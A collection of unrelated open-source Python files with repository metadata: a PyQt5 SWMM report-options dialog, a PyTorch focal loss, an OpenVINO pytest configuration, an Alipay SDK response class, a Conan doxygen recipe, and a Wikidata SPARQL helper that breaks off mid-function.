49b41b27bfcf7a934203935ccac3cee2ed7c538c
|
d49a589fc923c716c9ff607228282073126ce6cc
|
refs/heads/dev-ui-py3qt5
| 2022-10-06T14:55:55.322050
| 2022-09-26T19:25:09
| 2022-09-26T19:25:09
| 48,242,880
| 121
| 77
| null | 2020-09-15T15:18:32
| 2015-12-18T15:41:52
|
Python
|
UTF-8
|
Python
| false
| false
| 5,843
|
py
|
frmReportOptions.py
|
import PyQt5.QtGui as QtGui
import PyQt5.QtCore as QtCore
from PyQt5.QtWidgets import QMainWindow, QAbstractItemView
import core.swmm.options.report
from ui.SWMM.frmReportOptionsDesigner import Ui_frmReportOptions
class frmReportOptions(QMainWindow, Ui_frmReportOptions):
def __init__(self, main_form=None):
QMainWindow.__init__(self, main_form)
self.help_topic = "swmm/src/src/reportingoptionsdialog.htm"
self.setupUi(self)
self.cmdOK.clicked.connect(self.cmdOK_Clicked)
self.cmdCancel.clicked.connect(self.cmdCancel_Clicked)
self.cmdNodeAll.clicked.connect(self.cmdNodeAll_Clicked)
self.cmdNodeNone.clicked.connect(self.cmdNodeNone_Clicked)
self.cmdLinksAll.clicked.connect(self.cmdLinksAll_Clicked)
self.cmdLinksNone.clicked.connect(self.cmdLinksNone_Clicked)
self.cmdSubcatchmentsAll.clicked.connect(self.cmdSubcatchmentsAll_Clicked)
self.cmdSubcatchmentsNone.clicked.connect(self.cmdSubcatchmentsNone_Clicked)
self.set_from(main_form.project)
self._main_form = main_form
if (main_form.program_settings.value("Geometry/" + "frmReportOptions_geometry") and
main_form.program_settings.value("Geometry/" + "frmReportOptions_state")):
self.restoreGeometry(main_form.program_settings.value("Geometry/" + "frmReportOptions_geometry",
self.geometry(), type=QtCore.QByteArray))
self.restoreState(main_form.program_settings.value("Geometry/" + "frmReportOptions_state",
self.windowState(), type=QtCore.QByteArray))
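    # For reference, a sketch of the SWMM input-file [REPORT] section this
    # dialog edits (keyword names mirror the checkboxes and lists handled
    # below; the values shown are illustrative, not taken from this project):
    #   [REPORT]
    #   INPUT          NO
    #   CONTINUITY     YES
    #   FLOWSTATS      YES
    #   CONTROLS       NO
    #   NODES          ALL
    #   LINKS          NONE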
def set_from(self, project):
# section = core.swmm.options.report.Report()
section = project.find_section("REPORT")
self.cbxContinuity.setChecked(section.continuity)
self.cbxControls.setChecked(section.controls)
self.cbxFlow.setChecked(section.flow_stats)
self.cbxInput.setChecked(section.input)
self.cbxAverage.setChecked(section.averages)
# add nodes to list 1
self.listWidget.setSelectionMode(QAbstractItemView.ExtendedSelection)
self.listWidget.clear()
counter = -1
for node_group in project.nodes_groups():
if node_group and node_group.value:
for node in node_group.value:
self.listWidget.addItem(node.name)
counter += 1
if node.name in section.nodes:
self.listWidget.item(counter).setSelected(True)
        if section.nodes and section.nodes[0] == 'ALL':
            self.listWidget.selectAll()
# add links to list 2
self.listWidget_2.setSelectionMode(QAbstractItemView.ExtendedSelection)
self.listWidget_2.clear()
counter = -1
for link in project.all_links():
self.listWidget_2.addItem(link.name)
counter += 1
if link.name in section.links:
self.listWidget_2.item(counter).setSelected(True)
        if section.links and section.links[0] == 'ALL':
            self.listWidget_2.selectAll()
# add subcatchments to list 3
self.listWidget_3.setSelectionMode(QAbstractItemView.ExtendedSelection)
self.listWidget_3.clear()
counter = -1
for subcatchment in project.subcatchments.value:
self.listWidget_3.addItem(subcatchment.name)
counter += 1
if subcatchment.name in section.subcatchments:
self.listWidget_3.item(counter).setSelected(True)
        if section.subcatchments and section.subcatchments[0] == 'ALL':
            self.listWidget_3.selectAll()
def cmdOK_Clicked(self):
section = self._main_form.project.find_section("REPORT")
orig_continuity = section.continuity
orig_controls = section.controls
orig_flow_stats = section.flow_stats
orig_input = section.input
orig_nodes = section.nodes
orig_averages = section.averages
section.continuity = self.cbxContinuity.isChecked()
section.controls = self.cbxControls.isChecked()
section.flow_stats = self.cbxFlow.isChecked()
section.input = self.cbxInput.isChecked()
section.averages = self.cbxAverage.isChecked()
        # Persist ALL, NONE, or an explicit list of node names depending on the selection.
if self.listWidget.selectedItems().__len__() == self.listWidget.count():
section.nodes = ['ALL']
elif self.listWidget.selectedItems().__len__() == 0:
section.nodes = ['NONE']
else:
section.nodes = []
for item in self.listWidget.selectedItems():
section.nodes.append(str(item.text()))
if orig_continuity != section.continuity or \
orig_controls != section.controls or \
orig_flow_stats != section.flow_stats or \
orig_input != section.input or \
orig_nodes != section.nodes or \
orig_averages != section.averages:
self._main_form.mark_project_as_unsaved()
self._main_form.program_settings.setValue("Geometry/" + "frmReportOptions_geometry", self.saveGeometry())
self._main_form.program_settings.setValue("Geometry/" + "frmReportOptions_state", self.saveState())
self.close()
def cmdCancel_Clicked(self):
self.close()
def cmdNodeAll_Clicked(self):
self.listWidget.selectAll()
def cmdNodeNone_Clicked(self):
self.listWidget.clearSelection()
def cmdLinksAll_Clicked(self):
self.listWidget_2.selectAll()
def cmdLinksNone_Clicked(self):
self.listWidget_2.clearSelection()
def cmdSubcatchmentsAll_Clicked(self):
self.listWidget_3.selectAll()
def cmdSubcatchmentsNone_Clicked(self):
self.listWidget_3.clearSelection()
|
c2aec272e610cb8d76e5bfe4aa7459e125427168
|
0f7022644a8c708cce420f1d95cc82f254d49c3a
|
/focal_loss.py
|
ff21d89af42d3f4506cb508e4590f7dd8f46a806
|
[
"MIT"
] |
permissive
|
AdeelH/pytorch-multi-class-focal-loss
|
b6b597e0165c73aeab730e67127748f6aaaa2abe
|
2477bf68ac61d2d2e5e044c63f70b156073c5ffd
|
refs/heads/master
| 2023-04-12T10:58:14.782880
| 2022-10-14T18:38:26
| 2022-10-14T18:38:26
| 292,520,399
| 185
| 22
|
MIT
| 2022-10-14T18:38:27
| 2020-09-03T09:08:36
|
Python
|
UTF-8
|
Python
| false
| false
| 4,421
|
py
|
focal_loss.py
|
from typing import Optional, Sequence
import torch
from torch import Tensor
from torch import nn
from torch.nn import functional as F
class FocalLoss(nn.Module):
""" Focal Loss, as described in https://arxiv.org/abs/1708.02002.
It is essentially an enhancement to cross entropy loss and is
useful for classification tasks when there is a large class imbalance.
x is expected to contain raw, unnormalized scores for each class.
y is expected to contain class labels.
Shape:
- x: (batch_size, C) or (batch_size, C, d1, d2, ..., dK), K > 0.
- y: (batch_size,) or (batch_size, d1, d2, ..., dK), K > 0.
"""
def __init__(self,
alpha: Optional[Tensor] = None,
gamma: float = 0.,
reduction: str = 'mean',
ignore_index: int = -100):
"""Constructor.
Args:
alpha (Tensor, optional): Weights for each class. Defaults to None.
gamma (float, optional): A constant, as described in the paper.
Defaults to 0.
reduction (str, optional): 'mean', 'sum' or 'none'.
Defaults to 'mean'.
ignore_index (int, optional): class label to ignore.
Defaults to -100.
"""
if reduction not in ('mean', 'sum', 'none'):
raise ValueError(
'Reduction must be one of: "mean", "sum", "none".')
super().__init__()
self.alpha = alpha
self.gamma = gamma
self.ignore_index = ignore_index
self.reduction = reduction
self.nll_loss = nn.NLLLoss(
weight=alpha, reduction='none', ignore_index=ignore_index)
def __repr__(self):
arg_keys = ['alpha', 'gamma', 'ignore_index', 'reduction']
arg_vals = [self.__dict__[k] for k in arg_keys]
arg_strs = [f'{k}={v!r}' for k, v in zip(arg_keys, arg_vals)]
arg_str = ', '.join(arg_strs)
return f'{type(self).__name__}({arg_str})'
def forward(self, x: Tensor, y: Tensor) -> Tensor:
if x.ndim > 2:
# (N, C, d1, d2, ..., dK) --> (N * d1 * ... * dK, C)
c = x.shape[1]
x = x.permute(0, *range(2, x.ndim), 1).reshape(-1, c)
# (N, d1, d2, ..., dK) --> (N * d1 * ... * dK,)
y = y.view(-1)
unignored_mask = y != self.ignore_index
y = y[unignored_mask]
if len(y) == 0:
return torch.tensor(0.)
x = x[unignored_mask]
# compute weighted cross entropy term: -alpha * log(pt)
# (alpha is already part of self.nll_loss)
log_p = F.log_softmax(x, dim=-1)
ce = self.nll_loss(log_p, y)
# get true class column from each row
all_rows = torch.arange(len(x))
log_pt = log_p[all_rows, y]
# compute focal term: (1 - pt)^gamma
pt = log_pt.exp()
focal_term = (1 - pt)**self.gamma
# the full loss: -alpha * ((1 - pt)^gamma) * log(pt)
loss = focal_term * ce
if self.reduction == 'mean':
loss = loss.mean()
elif self.reduction == 'sum':
loss = loss.sum()
return loss
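# A minimal usage sketch for the class (the weights and shapes below are
# illustrative, not part of the original module):
#   fl = FocalLoss(alpha=torch.tensor([0.25, 0.75]), gamma=2.0)
#   loss = fl(torch.randn(4, 2), torch.tensor([0, 1, 1, 0]))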
def focal_loss(alpha: Optional[Sequence] = None,
gamma: float = 0.,
reduction: str = 'mean',
ignore_index: int = -100,
device='cpu',
dtype=torch.float32) -> FocalLoss:
"""Factory function for FocalLoss.
Args:
alpha (Sequence, optional): Weights for each class. Will be converted
to a Tensor if not None. Defaults to None.
gamma (float, optional): A constant, as described in the paper.
Defaults to 0.
reduction (str, optional): 'mean', 'sum' or 'none'.
Defaults to 'mean'.
ignore_index (int, optional): class label to ignore.
Defaults to -100.
device (str, optional): Device to move alpha to. Defaults to 'cpu'.
dtype (torch.dtype, optional): dtype to cast alpha to.
Defaults to torch.float32.
Returns:
A FocalLoss object
"""
if alpha is not None:
if not isinstance(alpha, Tensor):
alpha = torch.tensor(alpha)
alpha = alpha.to(device=device, dtype=dtype)
fl = FocalLoss(
alpha=alpha,
gamma=gamma,
reduction=reduction,
ignore_index=ignore_index)
return fl
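# Quick self-check of the factory: a sketch with made-up weights and shapes
# (x is (N, C) raw scores, y is (N,) integer labels, per the docstrings above).
if __name__ == '__main__':
    loss_fn = focal_loss(alpha=[0.2, 0.3, 0.5], gamma=2.0, reduction='mean')
    scores = torch.randn(8, 3)           # raw, unnormalized class scores
    labels = torch.randint(0, 3, (8,))   # integer class labels in [0, 3)
    print(loss_fn(scores, labels))       # prints a scalar loss tensor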
|
df255115b0a159837d3746b4c9c8cae5d52024dc
|
2ae0b8d95d439ccfd55ea7933ad4a2994ad0f6c5
|
/tests/time_tests/test_runner/conftest.py
|
48c9352b84d4449263d0535a75d747aa48dfbee6
|
[
"Apache-2.0"
] |
permissive
|
openvinotoolkit/openvino
|
38ea745a247887a4e14580dbc9fc68005e2149f9
|
e4bed7a31c9f00d8afbfcabee3f64f55496ae56a
|
refs/heads/master
| 2023-08-18T03:47:44.572979
| 2023-08-17T21:24:59
| 2023-08-17T21:24:59
| 153,097,643
| 3,953
| 1,492
|
Apache-2.0
| 2023-09-14T21:42:24
| 2018-10-15T10:54:40
|
C++
|
UTF-8
|
Python
| false
| false
| 13,965
|
py
|
conftest.py
|
# Copyright (C) 2018-2023 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
#
"""
Basic high-level plugin file for pytest.
See [Writing plugins](https://docs.pytest.org/en/latest/writing_plugins.html)
for more information.
This plugin adds the following command-line options:
* `--test_conf` - Path to test configuration file. Used to parametrize tests.
Format: YAML file.
* `--exe` - Path to a timetest binary to execute.
* `--niter` - Number of times to run executable.
"""
import hashlib
import json
import logging
# pylint:disable=import-error
import os
import shutil
import sys
import tempfile
from pathlib import Path
import pytest
import yaml
from jsonschema import validate, ValidationError
# add utils folder to imports
UTILS_DIR = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))), "utils")
sys.path.insert(0, str(UTILS_DIR))
from path_utils import check_positive_int
from platform_utils import get_os_name, get_os_version, get_cpu_info
from utils import upload_data, metadata_from_manifest, push_to_db_facade, modify_data_for_push_to_new_db, DB_COLLECTIONS
# -------------------- CLI options --------------------
def pytest_addoption(parser):
"""Specify command-line options for all plugins"""
test_args_parser = parser.getgroup("timetest test run")
test_args_parser.addoption(
"--test_conf",
type=Path,
help="Path to a test config",
default=Path(__file__).parent / "test_config.yml"
)
test_args_parser.addoption(
"--exe",
required=True,
dest="executable",
type=Path,
help="Path to a timetest binary to execute"
)
test_args_parser.addoption(
"--niter",
type=check_positive_int,
help="Number of iterations to run executable and aggregate results",
default=3
)
test_args_parser.addoption(
"--model_cache",
action='store_true',
help="Enable model cache usage",
)
db_args_parser = parser.getgroup("timetest database use")
db_args_parser.addoption(
'--db_submit',
metavar="RUN_ID",
type=str,
help='Submit results to the database. ' \
'`RUN_ID` should be a string uniquely identifying the run' \
' (like Jenkins URL or time)'
)
is_db_used = db_args_parser.parser.parse_known_args(sys.argv).db_submit
db_args_parser.addoption(
'--db_url',
type=str,
required=is_db_used,
help='MongoDB URL in a form "mongodb://server:port"'
)
db_args_parser.addoption(
'--db_collection',
type=str,
required=is_db_used,
help='Collection name in database',
choices=DB_COLLECTIONS
)
db_args_parser.addoption(
'--db_metadata',
type=str,
default=None,
help='Path to JSON-formatted file to extract additional information'
)
db_args_parser.addoption(
'--manifest',
type=Path,
required=is_db_used,
help='Path to build manifest to extract commit information'
)
db_args_parser.addoption(
'--db_api_handler',
type=str,
help='API handler url for push data to database',
default=''
)
@pytest.fixture(scope="session")
def test_conf(request):
"""Fixture function for command-line option."""
return request.config.getoption('test_conf')
@pytest.fixture(scope="session")
def executable(request):
"""Fixture function for command-line option."""
return request.config.getoption('executable')
@pytest.fixture(scope="session")
def niter(request):
"""Fixture function for command-line option."""
return request.config.getoption('niter')
@pytest.fixture(scope="session")
def model_cache(request):
"""Fixture function for command-line option."""
return request.config.getoption('model_cache')
# -------------------- CLI options --------------------
@pytest.fixture(scope="function")
def temp_dir(pytestconfig):
"""Create temporary directory for test purposes.
It will be cleaned up after every test run.
"""
temp_dir = tempfile.TemporaryDirectory()
yield Path(temp_dir.name)
temp_dir.cleanup()
@pytest.fixture(scope="function")
def cl_cache_dir(pytestconfig, instance):
"""Generate directory to save OpenCL cache before test run and clean up after run.
Folder `cl_cache` should be created in a directory where tests were run. In this case
cache will be saved correctly. This behaviour is OS independent.
More: https://github.com/intel/compute-runtime/blob/master/opencl/doc/FAQ.md#how-can-cl_cache-be-enabled
"""
if instance["device"]["name"] == "GPU":
cl_cache_dir = pytestconfig.invocation_dir / "cl_cache"
# if cl_cache generation to a local `cl_cache` folder doesn't work, specify
# `cl_cache_dir` environment variable in an attempt to fix it (Linux specific)
os.environ["cl_cache_dir"] = str(cl_cache_dir)
if cl_cache_dir.exists():
shutil.rmtree(cl_cache_dir)
cl_cache_dir.mkdir()
logging.info(f"cl_cache will be created in {cl_cache_dir}")
yield cl_cache_dir
shutil.rmtree(cl_cache_dir)
else:
yield None
@pytest.fixture(scope="function")
def model_cache_dir(pytestconfig, instance):
"""
    Generate a directory for the IE model cache before the test run and clean it up afterwards.
"""
if instance.get("use_model_cache"):
model_cache_dir = pytestconfig.invocation_dir / "models_cache"
if model_cache_dir.exists():
shutil.rmtree(model_cache_dir)
model_cache_dir.mkdir()
logging.info(f"model_cache will be created in {model_cache_dir}")
yield model_cache_dir
shutil.rmtree(model_cache_dir)
else:
yield None
@pytest.fixture(scope="function")
def test_info(request, pytestconfig):
"""Fixture for collecting timetests information.
Current fixture fills in `request` and `pytestconfig` global
fixtures with timetests information which will be used for
internal purposes.
"""
setattr(request.node._request, "test_info", {"results": {},
"raw_results": {},
"db_info": {}})
yield request.node._request.test_info
@pytest.fixture(scope="function")
def validate_test_case(request, test_info):
"""Fixture for validating test case on correctness.
Fixture checks current test case contains all fields required for
a correct work.
"""
schema = """
{
"type": "object",
"properties": {
"device": {
"type": "object",
"properties": {
"name": {"type": "string"}
},
"required": ["name"]
},
"model": {
"type": "object",
"properties": {
"path": {"type": "string"}
},
"required": ["path"]
}
},
"required": ["device", "model"],
"additionalProperties": true
}
"""
schema = json.loads(schema)
try:
validate(instance=request.node.funcargs["instance"], schema=schema)
except ValidationError:
request.config.option.db_submit = False
raise
yield
@pytest.fixture(scope="function")
def prepare_db_info(request, test_info, executable, niter, manifest_metadata):
"""Fixture for preparing and validating data to submit to a database.
Fixture prepares data and metadata to submit to a database. One of the steps
is parsing of build information from build manifest. After preparation,
it checks if data contains required properties.
"""
FIELDS_FOR_ID = ['run_id', 'timetest', 'model', 'device', 'niter']
run_id = request.config.getoption("db_submit")
if not run_id:
yield
return
# add db_metadata
db_meta_path = request.config.getoption("db_metadata")
if db_meta_path:
with open(db_meta_path, "r") as db_meta_f:
test_info["db_info"].update(json.load(db_meta_f))
# add model cache status
test_info["db_info"].update({"model_cache": request.config.getoption("model_cache")})
# add test info
info = {
# results will be added immediately before uploading to DB in `pytest_runtest_makereport`
"run_id": run_id,
"timetest": str(executable.stem),
"model": request.node.funcargs["instance"]["model"],
"device": request.node.funcargs["instance"]["device"],
"niter": niter,
"test_name": request.node.name,
"os": "_".join([str(item) for item in [get_os_name(), *get_os_version()]])
}
info['_id'] = hashlib.sha256(
''.join([str(info[key]) for key in FIELDS_FOR_ID]).encode()).hexdigest()
test_info["db_info"].update(info)
# add manifest metadata
test_info["db_info"].update(manifest_metadata)
# validate db_info
schema = """
{
"type": "object",
"properties": {
"device": {
"type": "object",
"properties": {
"name": {"type": "string"}
},
"required": ["name"]
},
"model": {
"type": "object",
"properties": {
"path": {"type": "string"},
"name": {"type": "string"},
"precision": {"type": "string"},
"framework": {"type": "string"}
},
"required": ["path", "name", "precision", "framework"]
},
"run_id": {"type": "string"},
"timetest": {"type": "string"},
"niter": {"type": "integer"},
"test_name": {"type": "string"},
"results": {"type": "object"},
"os": {"type": "string"},
"_id": {"type": "string"}
},
"required": ["device", "model", "run_id", "timetest", "niter", "test_name", "os", "_id"],
"additionalProperties": true
}
"""
schema = json.loads(schema)
try:
validate(instance=test_info["db_info"], schema=schema)
except ValidationError:
request.config.option.db_submit = False
raise
yield
@pytest.fixture(scope="session", autouse=True)
def manifest_metadata(request):
"""Fixture function for command-line option."""
run_id = request.config.getoption("db_submit")
if not run_id:
yield
return
manifest_meta = metadata_from_manifest(request.config.getoption("manifest"))
schema = """
{
"type": "object",
"properties": {
"product_type": {"type": "string"},
"repo_url": {"type": "string"},
"commit_sha": {"type": "string"},
"commit_date": {"type": "string"},
"branch": {"type": "string"},
"target_branch": {"type": "string"},
"version": {"type": "string"}
},
"required": ["product_type", "repo_url", "commit_sha", "commit_date", "branch", "target_branch", "version"],
"additionalProperties": false
}
"""
schema = json.loads(schema)
try:
validate(instance=manifest_meta, schema=schema)
except ValidationError:
request.config.option.db_submit = False
raise
yield manifest_meta
def pytest_generate_tests(metafunc):
"""Pytest hook for test generation.
Generate parameterized tests from discovered modules and test config
parameters.
"""
with open(metafunc.config.getoption('test_conf'), "r") as file:
test_cases = yaml.safe_load(file)
if test_cases:
metafunc.parametrize("instance", test_cases)
def pytest_make_parametrize_id(config, val, argname):
"""Pytest hook for user-friendly test name representation"""
def get_dict_values(d):
"""Unwrap dictionary to get all values of nested dictionaries"""
if isinstance(d, dict):
for v in d.values():
yield from get_dict_values(v)
else:
yield d
keys = ["device", "model"]
values = {key: val[key] for key in keys}
values = list(get_dict_values(values))
return "-".join(["_".join([key, str(val)]) for key, val in zip(keys, values)])
@pytest.mark.hookwrapper
def pytest_runtest_makereport(item, call):
"""Pytest hook for report preparation.
Submit tests' data to a database.
"""
run_id = item.config.getoption("db_submit")
if not run_id:
yield
return
data = item._request.test_info["db_info"].copy()
data["results"] = item._request.test_info["results"].copy()
data["raw_results"] = item._request.test_info["raw_results"].copy()
data["cpu_info"] = get_cpu_info()
data["status"] = "not_finished"
data["error_msg"] = ""
report = (yield).get_result()
if call.when in ["setup", "call"]:
if call.when == "call":
if not report.passed:
data["status"] = "failed"
data["error_msg"] = report.longrepr.reprcrash.message
else:
data["status"] = "passed"
db_url = item.config.getoption("db_url")
db_collection = item.config.getoption("db_collection")
logging.info(f"Upload data to {db_url}/{'timetests'}.{db_collection}. "
f"Data: {data}")
upload_data(data, db_url, 'timetests', db_collection)
db_api_handler = item.config.getoption("db_api_handler")
if db_api_handler and call.when == "call":
new_format_records = modify_data_for_push_to_new_db(data)
new_format_records['data'][0]["log"] = item._request.test_info["logs"]
push_to_db_facade(new_format_records, db_api_handler)
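# Hedged sketch of a database-submitting run (not part of the original file;
# all values are illustrative assumptions, and --db_collection must be one of
# DB_COLLECTIONS):
#   pytest test_runner/ --exe ./bin/timetest_infer --niter 3 \
#       --db_submit "jenkins-build-123" \
#       --db_url "mongodb://server:port" \
#       --db_collection <collection> \
#       --manifest ./manifest.yml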
|
86065e08b069917aac018f34f6f29bfa170aebdb
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/response/AlipayMarketingActivityGoodsBatchqueryResponse.py
|
aeb52ef8f9649686120d0d1c26958bd00b88eac7
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 2,884
|
py
|
AlipayMarketingActivityGoodsBatchqueryResponse.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.AppItemInfo import AppItemInfo
from alipay.aop.api.domain.ActivityGoodsInfo import ActivityGoodsInfo
class AlipayMarketingActivityGoodsBatchqueryResponse(AlipayResponse):
def __init__(self):
super(AlipayMarketingActivityGoodsBatchqueryResponse, self).__init__()
self._activity_id = None
self._app_item_infos = None
self._goods_infos = None
self._page_num = None
self._page_size = None
self._total_size = None
@property
def activity_id(self):
return self._activity_id
@activity_id.setter
def activity_id(self, value):
self._activity_id = value
@property
def app_item_infos(self):
return self._app_item_infos
@app_item_infos.setter
def app_item_infos(self, value):
if isinstance(value, list):
self._app_item_infos = list()
for i in value:
if isinstance(i, AppItemInfo):
self._app_item_infos.append(i)
else:
self._app_item_infos.append(AppItemInfo.from_alipay_dict(i))
@property
def goods_infos(self):
return self._goods_infos
@goods_infos.setter
def goods_infos(self, value):
if isinstance(value, list):
self._goods_infos = list()
for i in value:
if isinstance(i, ActivityGoodsInfo):
self._goods_infos.append(i)
else:
self._goods_infos.append(ActivityGoodsInfo.from_alipay_dict(i))
@property
def page_num(self):
return self._page_num
@page_num.setter
def page_num(self, value):
self._page_num = value
@property
def page_size(self):
return self._page_size
@page_size.setter
def page_size(self, value):
self._page_size = value
@property
def total_size(self):
return self._total_size
@total_size.setter
def total_size(self, value):
self._total_size = value
def parse_response_content(self, response_content):
response = super(AlipayMarketingActivityGoodsBatchqueryResponse, self).parse_response_content(response_content)
if 'activity_id' in response:
self.activity_id = response['activity_id']
if 'app_item_infos' in response:
self.app_item_infos = response['app_item_infos']
if 'goods_infos' in response:
self.goods_infos = response['goods_infos']
if 'page_num' in response:
self.page_num = response['page_num']
if 'page_size' in response:
self.page_size = response['page_size']
if 'total_size' in response:
self.total_size = response['total_size']
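# Hedged usage sketch (not part of the SDK file; the shape of the raw gateway
# body is an assumption):
#   resp = AlipayMarketingActivityGoodsBatchqueryResponse()
#   resp.parse_response_content(raw_gateway_body)  # raw_gateway_body: str from the gateway
#   print(resp.activity_id, resp.page_num, resp.total_size)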
|
542aac17b2ee3550916c5560aefdad6dc4375ae9
|
549270020f6c8724e2ef1b12e38d11b025579f8d
|
/recipes/doxygen/all/conanfile.py
|
7b30ce53b00608a1a3fb920201e3adb4c4f15bce
|
[
"MIT"
] |
permissive
|
conan-io/conan-center-index
|
1bcec065ccd65aa38b1fed93fbd94d9d5fe6bc43
|
3b17e69bb4e5601a850b6e006e44775e690bac33
|
refs/heads/master
| 2023-08-31T11:34:45.403978
| 2023-08-31T11:13:23
| 2023-08-31T11:13:23
| 204,671,232
| 844
| 1,820
|
MIT
| 2023-09-14T21:22:42
| 2019-08-27T09:43:58
|
Python
|
UTF-8
|
Python
| false
| false
| 3,743
|
py
|
conanfile.py
|
from conan import ConanFile
from conan.errors import ConanInvalidConfiguration
from conan.tools.cmake import CMake, CMakeDeps, CMakeToolchain, cmake_layout
from conan.tools.files import apply_conandata_patches, copy, export_conandata_patches, get
from conan.tools.microsoft import check_min_vs, is_msvc_static_runtime
from conan.tools.scm import Version
import os
required_conan_version = ">=1.52.0"
class DoxygenConan(ConanFile):
name = "doxygen"
description = "A documentation system for C++, C, Java, IDL and PHP --- Note: Dot is disabled in this package"
topics = ("installer", "devtool", "documentation")
homepage = "https://github.com/doxygen/doxygen"
license = "GPL-2.0-or-later"
url = "https://github.com/conan-io/conan-center-index"
package_type = "application"
settings = "os", "arch", "compiler", "build_type"
options = {
"enable_parse": [True, False],
"enable_search": [True, False],
}
default_options = {
"enable_parse": True,
"enable_search": True,
}
@property
def _settings_build(self):
return getattr(self, "settings_build", self.settings)
@property
def _minimum_compiler_version(self):
if Version(self.version) <= "1.9.1":
return {
"gcc": "5",
}
return {
"gcc": "7", # https://gcc.gnu.org/bugzilla/show_bug.cgi?id=66297
"Visual Studio": "15",
"msvc": "191",
}
def export_sources(self):
export_conandata_patches(self)
def layout(self):
cmake_layout(self, src_folder="src")
def requirements(self):
if self.options.enable_search:
self.requires("xapian-core/1.4.19")
self.requires("zlib/1.2.13")
def package_id(self):
del self.info.settings.compiler
def compatibility(self):
return [{"settings": [("build_type", "Release")]}]
def validate(self):
minimum_compiler_version = self._minimum_compiler_version.get(str(self.settings.compiler))
if minimum_compiler_version and Version(self.settings.compiler.version) < minimum_compiler_version:
raise ConanInvalidConfiguration(f"Compiler version too old. At least {minimum_compiler_version} is required.")
if Version(self.version) == "1.8.18":
check_min_vs(self, "191")
def build_requirements(self):
if self._settings_build.os == "Windows":
self.tool_requires("winflexbison/2.5.24")
else:
self.tool_requires("flex/2.6.4")
self.tool_requires("bison/3.8.2")
def source(self):
get(self, **self.conan_data["sources"][self.version], strip_root=True)
def generate(self):
tc = CMakeToolchain(self)
tc.variables["build_parse"] = self.options.enable_parse
tc.variables["build_search"] = self.options.enable_search
tc.variables["use_libc++"] = self.settings.compiler.get_safe("libcxx") == "libc++"
tc.variables["win_static"] = is_msvc_static_runtime(self)
tc.generate()
deps = CMakeDeps(self)
deps.generate()
def build(self):
apply_conandata_patches(self)
cmake = CMake(self)
cmake.configure()
cmake.build()
def package(self):
copy(self, "LICENSE", src=self.source_folder, dst=os.path.join(self.package_folder, "licenses"))
cmake = CMake(self)
cmake.install()
def package_info(self):
self.cpp_info.set_property("cmake_find_mode", "none")
self.cpp_info.libdirs = []
self.cpp_info.includedirs = []
# TODO: to remove in conan v2
self.env_info.PATH.append(os.path.join(self.package_folder, "bin"))
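# Hedged usage sketch (illustrative, not part of the recipe): a consumer would
# typically pull doxygen as a build tool in its own conanfile.py; the version
# reference below is a placeholder, not a recommendation.
#
#   def build_requirements(self):
#       self.tool_requires("doxygen/<version>")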
|
f68d2595ed6b02afc3a5504a3363e435307b3cb8
|
2142d4023bce901857ce33e9c46919bf78b06779
|
/baselines/EMNLP2019/wikidata.py
|
47a263450bf6d8f95f67a1c766f60cfce8db7add
|
[
"MIT"
] |
permissive
|
diffbot/knowledge-net
|
01281e75ba24a68c22a715b39ba93e8febc4b158
|
abc4ed3ebb88bfde8c1f02709371324ae6347ba0
|
refs/heads/master
| 2021-06-10T16:22:20.118879
| 2020-10-01T21:49:40
| 2020-10-01T21:49:40
| 179,616,035
| 260
| 38
|
MIT
| 2021-05-21T16:01:26
| 2019-04-05T03:55:03
|
Python
|
UTF-8
|
Python
| false
| false
| 2,582
|
py
|
wikidata.py
|
import requests
import os
from sqlitedict import SqliteDict
import time
import urllib.error  # explicit submodule import; needed by the HTTPError handler in request()
if not os.path.exists("./tmp"):
os.makedirs("./tmp")
db = SqliteDict(os.path.join('./tmp','properties_subject.db'), autocommit=True)
from SPARQLWrapper import SPARQLWrapper, JSON
ENDPOINT = 'https://query.wikidata.org/sparql'
def get_query_from_subjects_only(subject):
query = """
SELECT ?s ?relation ?o
WHERE {
{BIND(wd:%s AS ?s). ?s ?relation ?o}
}""" % (subject)
return query
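# For illustration, get_query_from_subjects_only("Q76") renders to:
#
#   SELECT ?s ?relation ?o
#   WHERE {
#     {BIND(wd:Q76 AS ?s). ?s ?relation ?o}
#   }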
def is_valid_or_convert(uri):
if uri == "":
return None
if uri[-1] == "/":
uri = uri[:-1]
uri = uri.split("/")[-1]
if uri[0] == "Q":
return uri
else:
return None
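# For illustration:
#   is_valid_or_convert("http://www.wikidata.org/entity/Q76")  -> "Q76"
#   is_valid_or_convert("http://www.wikidata.org/entity/P31")  -> None (not a Q-entity)
#   is_valid_or_convert("Q76")                                 -> "Q76"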
def request(subject, set_objects):
try:
triples = []
wikidata_response = db.get(subject, None)
        if wikidata_response is not None:
for t in wikidata_response.split("\n"):
subject = t.split("\t")[0]
property = t.split("\t")[1]
object = t.split("\t")[2]
if object in set_objects:
triples.append((subject, property, object))
else:
sparql = SPARQLWrapper(ENDPOINT)
query = get_query_from_subjects_only(subject)
sparql.setQuery(query)
sparql.setReturnFormat(JSON)
data = sparql.query().convert()
triples_2_store = ""
for p in data["results"]["bindings"]:
object = p["o"]["value"].split("/")[-1]
subject = p["s"]["value"].split("/")[-1]
property = p["relation"]["value"].split("/")[-1]
triples_2_store = triples_2_store + subject + "\t" + property + "\t" + object + "\n"
if object in set_objects:
triples.append((subject, property, object))
if triples_2_store != "":
db[subject] = triples_2_store.rstrip("\n")
return triples
except urllib.error.HTTPError:
time.sleep(1)
return request(subject, set_objects)
def get_properties(list_first_uri, list_second_uri):
list_first_uri_clean = [is_valid_or_convert(x) for x in list_first_uri if is_valid_or_convert(x) != None]
list_second_uri_clean = [is_valid_or_convert(x) for x in list_second_uri if is_valid_or_convert(x) != None]
propertiesBySubObj = {}
cont = 0
for subject in list_first_uri_clean:
cont+=1
triples = request(subject, set(list_second_uri_clean))
for t in triples:
